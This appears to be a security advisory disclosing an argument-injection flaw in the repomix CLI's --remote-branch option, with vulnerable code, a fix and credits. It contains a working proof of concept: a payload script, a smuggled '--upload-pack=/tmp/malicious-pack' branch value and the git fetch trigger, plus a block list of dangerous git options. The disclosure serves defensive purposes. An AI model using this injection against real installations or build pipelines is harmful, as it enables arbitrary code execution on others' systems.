repomix Vulnerable to Command Injection (RCE) via `--remote-branch` Argument Injection
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📋 Description
Vulnerability Metadata
| Field | Detail |
| --- | --- |
| Affected Component | src/core/git/gitCommand.ts (execGitShallowClone) |
| Impact | Arbitrary Command Execution / Security Control Bypass |
Summary
The --remote-branch CLI option in repomix is vulnerable to argument injection. User-supplied input is passed directly to git fetch and git checkout subprocesses via child_process.execFileAsync without sanitization, -- delimiters, or validation.
An attacker can inject arbitrary git command-line options. By injecting the --upload-pack option and specifying an SSH (git@...) or local (file://) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing dangerousParams blocklist implemented in validateGitUrl().
Vulnerable Code Analysis
File: src/core/git/gitCommand.ts
The remoteBranch parameter is appended directly to the arguments array for git subprocesses without the -- positional delimiter.
Sink 1 (Lines 118-127):
await deps.execFileAsync(
'git',
['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], // Vulnerable
gitRemoteOpts,
);
Sink 2 (Lines 148-151):
await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]); // Vulnerable
Bypassed Security Control (Lines 192-197):
The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (--upload-pack, --receive-pack, --config, --exec) within the validateGitUrl function. However, this validation is exclusively applied to the url variable and omitted for remoteBranch, creating a direct bypass.
Attack Flow
[Source] repomix --remote-branch <injected_option>
↓
src/cli/actions/remoteAction.ts:226 (cloneRepository)
↓
src/core/git/gitCommand.ts:118 (execGitShallowClone)
↓
[Sink] execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])
↓
[Execution] git invokes the payload binary via transport helper
Proof of Concept (Steps to Reproduce)
1. Create the Payload Create an executable bash script that writes system execution context to a file. (Reference: Screenshot_2026-05-18_13_02_16.png)
cat > /tmp/malicious-pack << 'EOF'
#!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack
2. Trigger the Vulnerability
Establish a dummy remote and trigger the fetch operation, injecting the --upload-pack argument.
(Reference: Screenshot_2026-05-18_13_08_36.png)
# Setup dummy bare remote
git init --bare /tmp/dummy-remote.git
# Initialize local repo and add remote
mkdir /tmp/test-fetch && cd /tmp/test-fetch
git init
git remote add origin file:///tmp/dummy-remote.git
# Execute vulnerability
git fetch --upload-pack=/tmp/malicious-pack origin 2>&1
3. Verify Execution
Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.
cat /tmp/repomix-pwned.txt
Expected Output:
=== RCE EXECUTED ===
uid=1000(kakashi) gid=1000(kakashi) groups=1000(kakashi)...
End-to-End Execution via Repomix:
repomix --remote [email protected]:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'
Impact
- Remote Code Execution: Complete system compromise with the privileges of the user executing
repomix. - CI/CD Compromise: If
repomixis utilized in automated pipelines where--remote-branchis populated by external triggers (e.g., webhook payloads, PR titles), attackers can compromise build servers and exfiltrate secrets.
Remediation
1. Implement Positional Delimiters (Primary Fix)
Append the -- delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing remoteBranch.
await deps.execFileAsync(
'git',
['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch],
gitRemoteOpts,
);
2. Apply Existing Blocklist to Branch Parameter (Defense in Depth)
Update execGitShallowClone to validate remoteBranch against the existing dangerousParams array.
const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec'];
if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) {
throw new RepomixError(`Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}`);
}
Attachments
Screenshot 1: Payload script created with executable permissions.
Screenshot 2: Vulnerable Code
Screenshot 3: Verifying RCE.
Credits
This vulnerability was discovered and responsibly disclosed by:
- Researcher: Abhijith S.
- GitHub: @kakashi-kx
- HackerOne/Bugcrowd: kakashi4kx
🎯 Affected products1
- npm/repomix:< 1.14.1